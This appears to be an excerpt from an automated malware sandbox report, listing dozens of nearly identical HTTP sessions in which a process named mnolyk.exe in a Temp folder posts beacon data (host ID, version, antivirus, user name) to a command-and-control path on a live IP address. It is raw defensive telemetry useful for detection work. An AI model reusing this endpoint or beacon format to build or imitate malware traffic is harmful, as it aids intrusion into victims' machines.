                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        393192.168.2.55008362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:35.186608076 CET593OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:35.253365040 CET594INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:35 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        394192.168.2.55008462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:35.437222958 CET595OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:35.509721041 CET595INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:35 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        395192.168.2.55008562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:35.682373047 CET596OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:35.746413946 CET596INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:35 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        396192.168.2.55008662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:35.914582014 CET597OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:35.980093002 CET597INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:35 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        397192.168.2.55008762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:36.155229092 CET598OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:36.220750093 CET598INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:36 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        398192.168.2.55008862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:36.403852940 CET599OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:36.504537106 CET599INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:36 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        399192.168.2.55008962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:36.683034897 CET600OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:36.748085976 CET600INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:36 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        4192.168.2.54969462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:29.585295916 CET204OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:29.649504900 CET205INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:29 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        40192.168.2.54973062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:44.596889973 CET241OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:44.663312912 CET241INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:44 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        400192.168.2.55009062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:36.931057930 CET601OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:36.995206118 CET601INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:36 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        401192.168.2.55009162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:37.165425062 CET602OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:37.233617067 CET602INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:37 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        402192.168.2.55009262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:37.397614002 CET602OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:37.461185932 CET603INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:37 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        403192.168.2.55009362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:37.648521900 CET604OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:37.713578939 CET604INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:37 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        404192.168.2.55009462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:37.890736103 CET605OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:37.956084013 CET605INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:37 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        405192.168.2.55009562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:38.133970976 CET606OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:38.208528996 CET606INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:38 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        406192.168.2.55009662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:38.394553900 CET607OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:38.459940910 CET607INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:38 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        407192.168.2.55009762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:38.635756969 CET608OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:38.701345921 CET608INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:38 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        408192.168.2.55009862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:38.869061947 CET608OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:38.933482885 CET609INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:38 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        409192.168.2.55009962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:39.101682901 CET610OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:39.167921066 CET610INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:39 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        41192.168.2.54973162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:47.855990887 CET242OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:47.920581102 CET242INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:47 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
